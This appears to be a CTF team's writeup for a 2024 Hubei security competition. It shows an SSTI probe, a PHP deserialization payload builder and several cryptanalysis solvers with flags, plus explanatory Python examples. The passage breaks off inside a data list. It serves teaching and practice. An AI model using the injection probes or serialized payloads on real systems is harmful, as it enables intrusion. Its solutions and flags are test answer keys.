Source: 天权信安 Network Security Ecosystem
Author: 天权信安 Network Security Team
2024 Hubei Province Network and Data Security Practical Skills Competition
天权信安 WriteUp
✦✦✦
Solutions
WEB.01
✦✦✦ 1. Quick-arithmetic contest
Steps:
Disable JavaScript and work through the 30 arithmetic problems by hand to obtain the flag.
WEB.02
✦✦✦ 2. Sal's gallery
Steps:
Submitting {{2*2}} as the name parameter of the Search endpoint echoes 4, so the parameter is rendered by a server-side template engine (SSTI).
Code:
/search?name={{2*2}}
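The {{2*2}} probe above is the classic SSTI check, but a page that already contains a "4" or that echoes the input back would give the same answer. The following is an added Python example, not code from the challenge or from this writeup: two constructed stand-ins for the /search?name= handler (a vulnerable one that evaluates {{ ... }} the way a template engine would, simulated with a restricted eval, and a hardened one that escapes the parameter as data), plus a probe that uses random operands and checks the product, so it cannot be fooled by literal echoes.

```python
import html
import random

# Added example (not the challenge's code). vulnerable_render / safe_render are
# constructed stand-ins for the /search?name= handler; ssti_probe tells them apart.


def vulnerable_render(name: str) -> str:
    """Simulates a template engine that evaluates {{ expr }} found in user input.
    A restricted eval stands in for the engine; in a real target the sink would be
    something like render_template_string(user_input)."""
    out = name
    while True:
        start = out.find("{{")
        end = out.find("}}", start + 2) if start != -1 else -1
        if start == -1 or end == -1:
            break
        expr = out[start + 2:end].strip()
        try:
            value = eval(expr, {"__builtins__": {}}, {})  # the injection sink
        except Exception:
            value = ""
        out = out[:start] + str(value) + out[end + 2:]
    return f"<h1>Results for {out}</h1>"


def safe_render(name: str) -> str:
    """Hardened form: the parameter is escaped and substituted, never evaluated."""
    return f"<h1>Results for {html.escape(name)}</h1>"


def ssti_probe(render, trials: int = 3, seed: int = 1337) -> bool:
    """Return True when render() evaluates template expressions.

    A fixed {{2*2}} probe can false-positive on a page that already contains a '4'
    or that echoes the input literally. Random four-digit operands whose product must
    appear, while the raw payload must NOT appear, avoid both cases."""
    rng = random.Random(seed)
    for _ in range(trials):
        a, b = rng.randint(1000, 9999), rng.randint(1000, 9999)
        payload = f"{{{{{a}*{b}}}}}"  # renders as {{a*b}}
        body = render(payload)
        if payload in body or str(a * b) not in body:
            return False
    return True


if __name__ == "__main__":
    print(vulnerable_render("{{2*2}}"))  # <h1>Results for 4</h1>
    print(safe_render("{{2*2}}"))        # <h1>Results for {{2*2}}</h1>
    print(ssti_probe(vulnerable_render), ssti_probe(safe_render))
```

Against a live target, `render` would be a small wrapper that performs the GET and returns the response body; the probe logic stays the same.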
WEB.03
✦✦✦ 3. popmart
Steps:
Serialize an instance of the popmart class below and submit it; __wakeup() runs on the server when the payload is unserialize()d, and $flag and $where_you_go are server-side globals.
Code:
<?php
class popmart{
    public $yuki;
    public $molly;
    public $dimoo;
    public function __construct(){
        $this->yuki='tell me where';
        $this->molly='dont_tell_you';
        $this->dimoo="you_can_guess";
    }
    // Called automatically by unserialize(); $flag and $where_you_go live on the server
    public function __wakeup(){
        global $flag;
        global $where_you_go;
        $this->yuki=$where_you_go;   // yuki is overwritten here, only molly stays under our control
        if($this->molly === $this->yuki){
            echo $flag;
        }
    }
}
// Build the payload locally: only the serialized property values reach the server
$exploit = new popmart();
$serialized_exploit = serialize($exploit);
echo $serialized_exploit;
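The PHP above echoes the serialized object for us, but when PHP is not at hand (or when the value of molly has to be varied per request) it is useful to emit the serialize() format directly. The following is an added Python example, not code from the challenge or this writeup: a small PHP serializer covering the scalar, array and object cases, and a helper that builds the popmart payload with a chosen molly value. The popmart class is taken from the challenge; everything else is assumed for illustration.

```python
from dataclasses import dataclass


@dataclass
class PhpObject:
    """A PHP object to serialize: class name plus its public properties, in order."""
    cls: str
    props: dict


def php_serialize(value) -> str:
    """Produce PHP serialize() output for None/bool/int/str/list/dict/PhpObject.
    String lengths are byte counts (PHP strings are byte strings), so multibyte
    characters must be measured after UTF-8 encoding."""
    if value is None:
        return "N;"
    if isinstance(value, bool):  # before int: bool is an int subclass
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode("utf-8"))}:"{value}";'
    if isinstance(value, (list, dict)):
        items = value.items() if isinstance(value, dict) else enumerate(value)
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in items)
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, PhpObject):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return f'O:{len(value.cls.encode("utf-8"))}:"{value.cls}":{len(value.props)}:{{{body}}}'
    raise TypeError(f"unsupported type: {type(value).__name__}")


def popmart_payload(molly: str) -> str:
    """Serialized popmart object with `molly` set to the value we want __wakeup()
    to compare against $where_you_go. All three properties are public, so the
    property names carry no visibility prefix (protected would be \\0*\\0name,
    private \\0popmart\\0name)."""
    obj = PhpObject("popmart", {
        "yuki": "tell me where",   # overwritten by __wakeup(), value irrelevant
        "molly": molly,
        "dimoo": "you_can_guess",
    })
    return php_serialize(obj)


if __name__ == "__main__":
    print(popmart_payload("dont_tell_you"))
```

Note that a payload with protected or private properties contains NUL bytes in the property names, so it has to be URL-encoded (%00) before it is put into a query string or cookie.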
CRYPTO.01
✦✦✦4 Mypow
Steps:
Reference:
https://blog.csdn.net/luochen2436/article/details/132138412
Code:
Challenge:
from Crypto.Util.number import *
from gmpy2 import *
import os
flag = b'xxx'
def Mypow(b, e, mod):
a = 1
while e:
e >>= 1
b = (b*b)%mod
if e&1:
a = (a*b)%mod
return a
def Genp(bit_length):
coeff = 2 ** 5 * 3 * 7
while True:
tmp_prime = getRandomNBitInteger(bit_length - 10)
p = coeff * tmp_prime + 1
if is_prime(p):
break
return p
def Genkeys(bit_length):
p,q = Genp(bit_length),Genp(bit_length)
n = p * q
hint = (2 * p + 7 * q) % n
return n, hint
if __name__ == '__main__':
e = next_prime(666)
n, hint = Genkeys(512)
m = bytes_to_long(os.urandom(30) + flag)
ct = Mypow(m,e,n)
print(f'n = {n}')
print(f'hint = {hint}')
print(f'ct = {ct}')
'''
n = 36443283250594259606482132779262570582448178589602577809591307671554949253094255209079689901493052116793388954529442162972106210862341856282788030374324677114528044629385805693771773377070021111949953333360526159026822968061585876873187059674130307295006486032106471182393880915860569773206853864515489855553
hint = 57792516722001523643789088224096258172899052039145876393373730235406451592173971020702024058282699663364267742428240581839287357212741266617791207580236457
ct = 24482128269957355675512496312977308128712253968496848873519792376434347925427116612997489113223781321628516365811583310346553402215907938918891908853234881284620764982626375301219763593402089309909155204943747718536894186749932544428588048770663458669109073657836937287831725958017345747881678942488157429000
'''
#sage: recover p from hint = 2p + 7q (no modular reduction happens, since 2p + 7q < n)
R.<x> = ZZ[]
f = 2*x^2 - hint*x + 7*n
p = int(f.roots()[0][0])   # the only integer root; the other root, 7q/2, is not an integer
q = n//p
Mypow(b,e,mod) is meant to be pow(m,e,n), but its result depends on the parity of e: the exponent is shifted right before its low bit is tested, so bit 0 of e is never used. For even e it equals pow(m,e,n); for odd e it equals pow(m,e-1,n). Here e = next_prime(666) = 673 is prime and therefore odd, so the exponent actually applied is 672 = 2^5·3·7, exactly the coeff from which Genp builds p and q.
Hence 672 divides both p-1 and q-1, gcd(e,phi)=e, and no decryption exponent exists; the problem becomes taking e-th roots in finite fields. Take the 672-th roots of ct in GF(p) and in GF(q) separately, combine every pair with CRT to enumerate all candidate m, and keep the one whose bytes contain DASCTF.
#sage
import gmpy2
from Crypto.Util.number import *
n = 36443283250594259606482132779262570582448178589602577809591307671554949253094255209079689901493052116793388954529442162972106210862341856282788030374324677114528044629385805693771773377070021111949953333360526159026822968061585876873187059674130307295006486032106471182393880915860569773206853864515489855553
hint = 57792516722001523643789088224096258172899052039145876393373730235406451592173971020702024058282699663364267742428240581839287357212741266617791207580236457
ct = 24482128269957355675512496312977308128712253968496848873519792376434347925427116612997489113223781321628516365811583310346553402215907938918891908853234881284620764982626375301219763593402089309909155204943747718536894186749932544428588048770663458669109073657836937287831725958017345747881678942488157429000
R.<x> = ZZ[]
f = 2*x^2 - hint*x + 7*n          # hint = 2p + 7q (2p + 7q < n, so no reduction), p is an integer root
p = int(f.roots()[0][0])
q = n//p
e = int(gmpy2.next_prime(666)) - 1   # Mypow drops bit 0 of 673, so the exponent really used is 672
# 672 | p-1 and 672 | q-1, so x^672 = ct has 672 roots in each field
R.<x> = GF(p)[]
f = x^e - ct
results1 = f.roots()
R.<x> = GF(q)[]
f = x^e - ct
results2 = f.roots()
for i in results1:
    for j in results2:
        param1 = [int(i[0]), int(j[0])]
        param2 = [p, q]
        m = CRT_list(param1, param2)
        flag = long_to_bytes(int(m))
        if b'DASCTF' in flag:
            print(flag)
            break
Flag:
DASCTF{FastP0w3r_4nd_AMM_0f_R5A}
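Two of the claims above can be checked without Sage: that Mypow really applies e with its low bit cleared, and that p falls straight out of the hint because the discriminant of 2x^2 - hint·x + 7n is the perfect square (2p - 7q)^2. The following is an added Python example, not code from the challenge or this writeup; N and HINT are the challenge's printed values, E_FACTORS are the prime factors of 672, and the toy field GF(2017) (2016 = 3·672) is chosen here only to show why x^672 = ct has 672 roots per prime, which is what forces the 672·672 CRT loop in the Sage script. Finding the first root (what Sage's roots() does) is not reproduced.

```python
from math import isqrt

# Added example, not the challenge's or the writeup's code. N and HINT are the values
# printed by the challenge; everything else is derived from its source.

N = 36443283250594259606482132779262570582448178589602577809591307671554949253094255209079689901493052116793388954529442162972106210862341856282788030374324677114528044629385805693771773377070021111949953333360526159026822968061585876873187059674130307295006486032106471182393880915860569773206853864515489855553
HINT = 57792516722001523643789088224096258172899052039145876393373730235406451592173971020702024058282699663364267742428240581839287357212741266617791207580236457
E = 673                 # next_prime(666)
E_FACTORS = (2, 3, 7)   # 672 = 2^5 * 3 * 7, the `coeff` used by Genp


def mypow(b: int, e: int, mod: int) -> int:
    """The challenge's Mypow, verbatim: e is shifted BEFORE its low bit is tested,
    so bit 0 of e never contributes. The result is b^(e & ~1) mod `mod`."""
    a = 1
    while e:
        e >>= 1
        b = (b * b) % mod
        if e & 1:
            a = (a * b) % mod
    return a


def effective_exponent(e: int) -> int:
    """Exponent Mypow actually applies: e with its low bit cleared."""
    return e & ~1


def recover_pq(n: int, hint: int):
    """hint = (2p + 7q) mod n, but 2p + 7q < n for two 512-bit primes, so hint = 2p + 7q
    exactly. p is then a root of 2x^2 - hint*x + 7n = 0, whose discriminant
    hint^2 - 56n = (2p - 7q)^2 is a perfect square: no polynomial root-finding needed."""
    disc = hint * hint - 56 * n
    r = isqrt(disc)
    if r * r != disc:
        raise ValueError("hint is not 2p + 7q: discriminant is not a square")
    for numerator in (hint - r, hint + r):   # roots are (hint +- r) / 4; only p is an integer
        if numerator % 4 == 0 and n % (numerator // 4) == 0:
            p = numerator // 4
            return p, n // p
    raise ValueError("no integer root divides n")


def eth_roots_of_unity(p: int, e: int, e_factors) -> list:
    """All e-th roots of unity in GF(p) (requires e | p-1): g^((p-1)/e) has order
    dividing e, and order exactly e iff no proper power e/l of it collapses to 1."""
    g = 2
    while True:
        zeta = pow(g, (p - 1) // e, p)
        if all(pow(zeta, e // l, p) != 1 for l in e_factors):
            break
        g += 1
    return [pow(zeta, k, p) for k in range(e)]


def all_eth_roots(one_root: int, p: int, e: int, e_factors) -> list:
    """Every x in GF(p) with x^e == one_root^e: one_root times each e-th root of unity.
    This is why x^672 = ct has 672 roots in GF(p) and 672 in GF(q)."""
    return sorted(one_root * z % p for z in eth_roots_of_unity(p, e, e_factors))


if __name__ == "__main__":
    p, q = recover_pq(N, HINT)
    print("p =", p)
    print("Mypow applies exponent", effective_exponent(E))
    roots = all_eth_roots(123, 2017, 672, E_FACTORS)   # toy field, m = 123 is one of 672 roots
    print(len(set(roots)), "roots of x^672 = 123^672 in GF(2017); 123 among them:", 123 in roots)
```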
CRYPTO.02
✦✦✦5 easycrypto
Steps:
Reference:
https://blog.csdn.net/luochen2436/article/details/132964576
Challenge:
from Crypto.Util.number import *
from secret import FLAG
m = bytes_to_long(FLAG)
def getpq(nbit):
p = getPrime(nbit)
q = getPrime(nbit)
if p > q:
return p, q
else:
return q, p
p, q = getpq(512)
P = (p - q) & ((1 << 130) - 1)
n = p * q
leak_p = p >> 256
c = pow((1 + P * n), m, n ** 3)
print('n =', n)
print('leak_p =', leak_p)
print('c =', c)
# n = 135133139540786818977969958456509467902948924003478556140490841984247464940261764739984274397650928404945721248284577232814352745333641188749824519153271662051302477973525156608141358709265683759057060630360909926255299541198485901065352661702656282587105799982740927802530997159098015074633017964344230291287
# leak_p = 115314121469787984258489158421056136177545051135641551928888818017665807264468
# c = 1836794759996264077871820946090708779709415760553736759453665641907562256633157424959089180650539327925671892742819931875681606982615287882656254828326465758462357812873839261469783652663796071814218493268788421243190729887313099383264588659922912876424206670310928514588754069909128149471326084547056385690037197908766053620702238356084124023146075698878494434053246157524775269473152458661801907641122308756667762880284617915774590075511686821816948174618196839335059944389423693187930672934293905608970421003536691336581450927887931599275461176935079227494931457562345640133982771901848553204154760760399724074615092290799119053032875792219794072963200108352944441876206386518960615891547166767499506114294860833404421893612197040731184031783165365621722947731966143226777081983415797778111715332055871302609049501876860012070502369090417942239749695034267695710324328867728296996779
The top 256 bits of p are leaked. For a 512-bit factor of a 1024-bit n that is right at the theoretical boundary and in practice not enough for small_roots, so we brute-force the next 8 bits and let Coppersmith recover the remaining 248.
#sage
from tqdm import *
n = 135133139540786818977969958456509467902948924003478556140490841984247464940261764739984274397650928404945721248284577232814352745333641188749824519153271662051302477973525156608141358709265683759057060630360909926255299541198485901065352661702656282587105799982740927802530997159098015074633017964344230291287
p_high = 115314121469787984258489158421056136177545051135641551928888818017665807264468
c = 1836794759996264077871820946090708779709415760553736759453665641907562256633157424959089180650539327925671892742819931875681606982615287882656254828326465758462357812873839261469783652663796071814218493268788421243190729887313099383264588659922912876424206670310928514588754069909128149471326084547056385690037197908766053620702238356084124023146075698878494434053246157524775269473152458661801907641122308756667762880284617915774590075511686821816948174618196839335059944389423693187930672934293905608970421003536691336581450927887931599275461176935079227494931457562345640133982771901848553204154760760399724074615092290799119053032875792219794072963200108352944441876206386518960615891547166767499506114294860833404421893612197040731184031783165365621722947731966143226777081983415797778111715332055871302609049501876860012070502369090417942239749695034267695710324328867728296996779
pbits=512
for i in trange(2**8):            # brute-force the 8 bits right below the leaked high 256
    p4 = (p_high << 8) + i
    kbits = pbits - p4.nbits()    # 248 low bits are still unknown
    p4 = p4 << kbits
    R.<x> = PolynomialRing(Zmod(n))
    f = x + p4
    roots = f.small_roots(X=2^kbits, beta=0.4, epsilon=0.01)
    if roots:
        p = p4 + int(roots[0])
        if n % p == 0:
            print(i, p)
            break
#i = 197,p = 13352463043552409670211183534740157814546713901105410408023687926498813469217507846107364405269402732967687839808637375591530105677153038557366731161035343
With p and q = n/p known we compute P = (p - q) & ((1 << 130) - 1). Expanding c = (1 + P·n)^m by the binomial theorem, every term after the linear one carries a factor n^2, so c ≡ 1 + m·P·n (mod n^2) and therefore m ≡ (c - 1)/n · P^(-1) (mod n), which is exact because m < n.
Solution code:
import gmpy2
from Crypto.Util.number import *
n = 135133139540786818977969958456509467902948924003478556140490841984247464940261764739984274397650928404945721248284577232814352745333641188749824519153271662051302477973525156608141358709265683759057060630360909926255299541198485901065352661702656282587105799982740927802530997159098015074633017964344230291287
c = 1836794759996264077871820946090708779709415760553736759453665641907562256633157424959089180650539327925671892742819931875681606982615287882656254828326465758462357812873839261469783652663796071814218493268788421243190729887313099383264588659922912876424206670310928514588754069909128149471326084547056385690037197908766053620702238356084124023146075698878494434053246157524775269473152458661801907641122308756667762880284617915774590075511686821816948174618196839335059944389423693187930672934293905608970421003536691336581450927887931599275461176935079227494931457562345640133982771901848553204154760760399724074615092290799119053032875792219794072963200108352944441876206386518960615891547166767499506114294860833404421893612197040731184031783165365621722947731966143226777081983415797778111715332055871302609049501876860012070502369090417942239749695034267695710324328867728296996779
p = 13352463043552409670211183534740157814546713901105410408023687926498813469217507846107364405269402732967687839808637375591530105677153038557366731161035343
q = n//p
P = (p - q) & ((1 << 130) - 1)
# (1 + P*n)^m = 1 + m*P*n + C(m,2)*P^2*n^2 + ...: all terms past the linear one are multiples of n^2,
# so (c - 1)//n == m*P (mod n) and m == (c - 1)//n * P^-1 (mod n)   (requires m < n)
m = (c-1)//n*gmpy2.invert(P,n) % n
flag = long_to_bytes(m)
print(flag)
#DASCTF{365d0d2cda3a3836a19bf1f46760d875}
Flag:
DASCTF{365d0d2cda3a3836a19bf1f46760d875}
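The Coppersmith step needs Sage, but the binomial step is plain integer arithmetic and is worth having as an independent check. The following is an added Python example, not code from the challenge or this writeup: it re-implements the challenge's encryption, the recovery of m from (c - 1)/n, and a self-check on small constructed primes where the plaintext is known. N and C are the challenge's values and P_RECOVERED is the p printed by the Coppersmith loop above; the toy primes are chosen here for illustration only.

```python
# Added example, not the challenge's or the writeup's code. N, C are the challenge's values;
# P_RECOVERED is the factor found by the Coppersmith step (which needs Sage and is not redone here).

N = 135133139540786818977969958456509467902948924003478556140490841984247464940261764739984274397650928404945721248284577232814352745333641188749824519153271662051302477973525156608141358709265683759057060630360909926255299541198485901065352661702656282587105799982740927802530997159098015074633017964344230291287
C = 1836794759996264077871820946090708779709415760553736759453665641907562256633157424959089180650539327925671892742819931875681606982615287882656254828326465758462357812873839261469783652663796071814218493268788421243190729887313099383264588659922912876424206670310928514588754069909128149471326084547056385690037197908766053620702238356084124023146075698878494434053246157524775269473152458661801907641122308756667762880284617915774590075511686821816948174618196839335059944389423693187930672934293905608970421003536691336581450927887931599275461176935079227494931457562345640133982771901848553204154760760399724074615092290799119053032875792219794072963200108352944441876206386518960615891547166767499506114294860833404421893612197040731184031783165365621722947731966143226777081983415797778111715332055871302609049501876860012070502369090417942239749695034267695710324328867728296996779
P_RECOVERED = 13352463043552409670211183534740157814546713901105410408023687926498813469217507846107364405269402732967687839808637375591530105677153038557366731161035343


def low_bits_of_diff(p: int, q: int, bits: int = 130) -> int:
    """The challenge's P: the low `bits` bits of p - q (getpq guarantees p > q)."""
    return (p - q) & ((1 << bits) - 1)


def encrypt(m: int, n: int, P: int) -> int:
    """c = (1 + P*n)^m mod n^3, exactly as the challenge computes it."""
    return pow(1 + P * n, m, n ** 3)


def recover_m(c: int, n: int, P: int) -> int:
    """Binomial theorem: (1 + Pn)^m = 1 + m*P*n + C(m,2)*P^2*n^2 + ...; every term
    after the linear one is a multiple of n^2, so (c - 1)/n == m*P (mod n) and
    m == (c - 1)/n * P^-1 (mod n). Exact whenever m < n and gcd(P, n) = 1."""
    t = ((c - 1) // n) % n
    return t * pow(P, -1, n) % n


def long_to_bytes(x: int) -> bytes:
    return x.to_bytes((x.bit_length() + 7) // 8, "big")


def solve(n: int, c: int, p: int) -> bytes:
    """Full decryption once p is known: derive q and P, then invert the linear term."""
    q = n // p
    if p * q != n or p <= q:
        raise ValueError("p must be the larger prime factor of n, as getpq() returns it")
    return long_to_bytes(recover_m(c, n, low_bits_of_diff(p, q)))


if __name__ == "__main__":
    # self-check on constructed toy primes (p > q, both odd, so gcd(P, n) = 1)
    p_toy, q_toy = 1000003, 999983
    n_toy = p_toy * q_toy
    P_toy = low_bits_of_diff(p_toy, q_toy)
    assert recover_m(encrypt(12345, n_toy, P_toy), n_toy, P_toy) == 12345
    print(solve(N, C, P_RECOVERED))
```

The m < n condition is what makes the scheme breakable here: with the flag far shorter than 1024 bits the mod-n reduction loses nothing, and the n^3 modulus only ensures the quadratic binomial term does not wrap.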
CRYPTO.03
✦✦✦
6 Another leak of LCG
Steps: this is a recycled challenge. We found the published solver, it did not run as-is, so we patched it and ran it to get the result.
Seed recovery: starting from the last round, step the generator backwards. In each round only the non-* bits of the leak are used, assembled into an integer least-significant bit first. The previous seed follows from the linear congruence as (seed - b) * inverse(a, M) % M.
Flag recovery: the flag is XORed with the seed, so flag = c ^ seed, where c is the given ciphertext.
Flag decoding: try several encodings (utf-8, latin1), check that the result is all ASCII, and keep the best decode.
Formulas
Seed inversion: seed = (seed - b) * inverse(a, M) % M
Flag recovery: flag = c ^ seed
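The two formulas above, as an added Python example that is not the writeup's script and not the original challenge's code. The challenge's modulus M and the full state values are not on this page, so the LCG parameters (MMIX constants with M = 2^64), the seed and the flag below are constructed purely to exercise the inverse step, the LSB-first parsing of a leak string with * for unknown bits, and the final XOR. Recovering full states from the sparse leaked bits in x is the part of the solver that is not reproduced here.

```python
# Added example, not the writeup's script. Parameters are constructed (MMIX LCG, M = 2^64);
# the challenge's real M and state values are not on the page.

M = 1 << 64
A = 6364136223846793005   # odd, hence invertible mod 2^64
B = 1442695040888963407


def lcg_next(state: int, a: int = A, b: int = B, m: int = M) -> int:
    return (a * state + b) % m


def lcg_prev(state: int, a: int = A, b: int = B, m: int = M) -> int:
    """Inverse step: seed = (state - b) * a^-1 mod M. Needs gcd(a, M) = 1."""
    return (state - b) * pow(a, -1, m) % m


def recover_seed(last_state: int, rounds: int, a: int = A, b: int = B, m: int = M) -> int:
    """Walk the recurrence backwards `rounds` times from the last known state."""
    s = last_state
    for _ in range(rounds):
        s = lcg_prev(s, a, b, m)
    return s


def parse_leak(bits: str):
    """Turn one leak string (chars '0'/'1'/'*', least-significant bit first, as the
    writeup assembles it) into (value, mask): value holds the known bits, mask marks
    which bit positions are known."""
    value = mask = 0
    for i, ch in enumerate(bits):
        if ch == "*":
            continue
        mask |= 1 << i
        if ch == "1":
            value |= 1 << i
    return value, mask


def matches_leak(state: int, bits: str) -> bool:
    """Does a candidate state agree with the leaked bits of that round's output?"""
    value, mask = parse_leak(bits)
    return state & mask == value


def make_leak(state: int, width: int, keep_every: int) -> str:
    """Constructed leak: LSB-first bit string of `state` with only every `keep_every`-th
    bit revealed and the rest masked with '*', mimicking the x[] entries."""
    lsb_first = format(state, f"0{width}b")[::-1]
    return "".join(ch if i % keep_every == 0 else "*" for i, ch in enumerate(lsb_first))


def recover_flag(c: int, seed: int) -> int:
    return c ^ seed


def int_to_bytes(x: int) -> bytes:
    return x.to_bytes((x.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    flag = int.from_bytes(b"DASCTF{constructed_toy_flag}", "big")
    seed0 = 0x123456789ABCDEF0
    c = flag ^ seed0                    # the challenge's c = flag ^ seed
    state = seed0
    for _ in range(40):
        state = lcg_next(state)
    print(matches_leak(state, make_leak(state, 64, 7)))
    print(int_to_bytes(recover_flag(c, recover_seed(state, 40))))
```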
Code:
from Crypto.Util.number import long_to_bytes
c = 16881580266371213879199933551551391657843465997606963348664525781336437594162520786815349648165563542125219063481822246500499434326624995868766335675376062002958905249433093212
a = 7048435472566573813031570507837890091364947084306630050544242220147807292350445564322172244244726206563452305566866223414437853917448623276909090327076693
b = 9204853069421046007176344891235245198607052139715825810823076231566533652655127030214860066312526149219510111657539481375881111759200483396551737326166933
x = ['**********************1*****************************************************************************0******************************************************************************************************************1*************************************************************************************1*********************************************0*********************************************************************************************************************************************************1**********', '**1**************************0*********************1************************************************************************************0**********************************************************************************************************************************1******************************0********************************0********************************1*****************************************************************************************************************************************0*********', '*************************************************************************************1*********************************1*********************************************************************1**********************************************************************************************************************************************************************0*******************************************************************************1******************************************1********************************', 
'**************************0**************************************************1***********************0******************************************************1*********************************************************************************************************************0*************************1***********************************************************1******************************************************************1*************0*****************************************************************1****', '******0******************************************************1*************0******************************1****1*********************************************1*******************************************************0*********************************************************************************1*****************************************0******************************************************1**********************************************************************1************************************************', '***********************************0******************1**********0*****************************************************************************************************************************************************0*******************************1************************************************************1**************0*************************************1**************************1***************************************************************************************0***********************************', 
'********************************00************************************************************************00************************************************************************************************************0*******************************0*0********1***********1*1***********1****0***********************************************************************************************************0*********************************************************************0******************************************0', '***************************0******************************************1****************0*************************1**********************0************************************************************************0*************************0***************0****************************0*******1***************1******************0*******************1**********************************************************************************************************************************************0****************0********', '**0********************************************************************************1************************1*************************************************************************1*************************1*************************1***************1*****************************************************************************************************************0**********************************01**************1********************************************************************************************0***', 
'**1*******************************************************************************1*********************************1******0*****************************************************************************************************1*********************************************************************************************1***************1********************************1*************************************0**0******************************************************************************************************', '********************************************************************************************************************************************************0********************************************0***0*************************************************************0*******1***********************0****************************1*********************************************************************************************0**********************************************0*******1**********************************0***', '***************************************************************************************************************************0**********************1*********0*********************************************************************************1*******0**********************************************************0*************************************************************************************************1************************************************************************************************************', 
'******************************************************************************************************0************1**0******************************1******************************************1****************************1******0*****************************************************************************************************************************************************0*******************0*********************0*******************************************************************************************', '****1************1***********************************************************************************************************1*****************************************************1***************************************************1**********************************************************************************************************************0*******************************0*****************0*************************1********************************************0*********0**0***1***********************', '******0************************************************************************0***************************************************************************************************************************************************************1**************************************************************************************************************************************************************1********************1********1**************************************************0******************0*************', 
'**********1********************************1*****************************************************************0*****************************************************************************************************************************************1***1***************0*******************1******************************************************************0****************************************01*****************************************************************************************************************0*', '**********1**************************************************************************************************************************************************************************************************************************************************************************************1******************0******************************************************************************************************************************************************************1****************************************', '**************************************************************************************************************************************0************************************************************0***************************************************************************************************************************************************************************************************0***********0**************************************************************0***************1*****************************', 
'*******************************************************0*********************************************************************************************************************************1****1****************************************************************0*******0*****************************************************************************************************************0***************0*******************************************************************************0**************************************', '*******11***********1*************************1****************************************************************************************************************************************************************************1******************0******************0************************************************************************************************0*****************1*****************************************************************************************************************************************0*', '******************************************************************1****************************************************************************************************0**************************************************1********************************************************************************************************************************************************************************************************************************************************0*******1***************************1********', 
'*******************0**************************************************0****************************************************1*************************************1*********************************************************************************************************************************************************0***************0*******0***************************************************0*******************************************************************************************************1**0*************', '********************1**********1*******************************0*********************11*************************************************************0*************************************************************************0******************************************************************0**********************************************************************************1***************0**1*****************1*********************************************************0********************************************', '*************************0********************************************************************************************************0**************01************0************************************************1*****************0**************0*********************1*********0************0*****************************************1***1**************************************************************************0**********************************************1************1********************************************', 
'*****************************************************************************1***************1*****1***********************************************************************************************************************0****************************************************************************************************1*************************0****************1*************************************************************************0**************************************************************************', '***************1**********1**********************************************************0***************************************************************************************************************0**************0**********1*******************************1*****************************************************************************************0**********************************************************************************************0******************************************************************0****', '***1*****************************************************************************************************0***************************************************************************************************************1**************************************************0***************0********************************************************1*******************************************1*****************************************************************************************************************0************', 
'*********************************************0*1***************************************************0****************************************************************************************************1********************************************************************************************************0*******************************0**************************************************0**********0***********1********************************************************************1**********************0***0***1', '************10*******************************************0**********************************1************************0****************************0*************************************************************************************************1***************************0****0*1**********************************************1******0*************************************************1********************************************************************************************************************************', '**************************************1*************0**************1*************1*****************0**********1****************************************************************************************************************************************************************************************************************************************************0********************1*******************0************************************************1***************1**************************************************', 
'**************************************************************************************************************1****************0*************************1****0******************************************0****************************************************************0***********************************************************************0*************************************************0**********************0**********************************************0**1**************************************************', '******************************************0************************************************************00***********************************************************************************************************************************1*************************************************************************************************************************************************************1***********************1**************************0******************************************************************', '******************************************************************************************************1*1***********0*************************************************************0********************************************************************************1*********************************0*******1********************************************************************************************1*****************************1*************************1*************************************1***********************', 
'**************0******0*************1*********0************************************1******************0**1****************************************************************************************************************************0*************1****************************1****************************************1***********************0*****************************************************************************0********0*1******************1**********************1*******************************************', '***************************1***************************************************************************************************1**********************************1******************************************1********************************************************************************************************************0*********11*****************************************************************************************************************************************************1****************************', '***********************************************************************************************************1*******************************1***********************1*****1**************************************************************************************************1**************0*******1*************************************1**********************************************************************************************************************************************1********************************1******', 
'***************************************************************0**0************************************0********************************************************************************************************0**************************1*********************************************1************************************************************************1***0*************************************************1************************************************1********1***************0********************1********', '*****************************************0**0******************0***************************************************************1*********1**1***************************************************1***********************************************0***************************0**********1********1*****************0*************************************************0***********************0**********************************1******************************************************************10****************************', '********************************************************************************************************************************************************************1****************************************************1****************************************************************************0***************************************************************************************************************************************0**********************************************************0**********************', 
'**********************************0**************************************************0*************************************0**********************************0**********************************************************************************0*****0***********************************************************0*************************************0***************************0******************************1*0*********************************************************************************************************', '**************************************************************************************************************1***0*********************0***************************0**************************1*****************1****************************************************************************************************************************************************************************************************************0************************0********************************************************************', '*****************************************************************1************************************0*****************************0*******************************************************0********************0*********************************************0***********************0*****0****************************************************************************0**********************0**1***************************************************************************************************************************', 
'**********************************************************1*****************1**************************************************************0****************************************************************1**************************************************************************************************************************************0*********************************************************************************************1******************************************************************************', '***************0***************************************************************************0************1***************1**************************************1************1**************************************************************************************************0*************************************************************************************************************************************1************************************************0*********************************************************', '*******************************************************************************************************************10**********************************************************************************************************************************1*******************0**********0**********1*****************************************************0******************************************************************************1***0*****************************************************************1*******************', 
'******************************00***********0**************************************************0***************************************************************************0************0*****************0****************************0******************************************************************************************************************************************************************************1***************0*****************************0******************0*****************************************', '*********************0*****************************************0*********************1****************1***************************10*************************1**********0***************************************************************************************************************************************************************1************0********************************************0*****************************************************************************************************************************', '***************************************************1*01*********************1***************************************1************************1*******0******************************************1*******************************************************************************0********************1**0*****0******************************************************************************************0*1********************************************************************************************************************', 
'***************************1*******************1*****************************************************************************************0*****************************************************************************************************************************0*****************************0*********************1*****1*************************0***************1******************1***********************************************************0******************************************0*1************************', '****************************1******************************************************************************0****************0**********************************************************************************************0**************************************************1********************************************************************************************************1***********************0***************************1*********************************0****************************0*********************', '*********************************************************1***************************************0**********************************************************0***************************1*******************************************************0*********************************************************************************************************************1***************************0****************************0*1**************0***************************0***************************************************', 
'**************************0******11*******************************************************************************0**********************************************************0****************************1**********0**********************************************************************************************************************************************************************************************************************************************************************************************************', '*******************1*****************************************************************************************************************************************************************************************0************************************************************************************1**********************************************************0*************0***************************************************************************************************1************************************************', '***************1***********************************0*********1********************0***********************1*************************************1*********************************************************************0***********************************************************************************************************************************************************************************************************************0***********************************************0*********************************', 
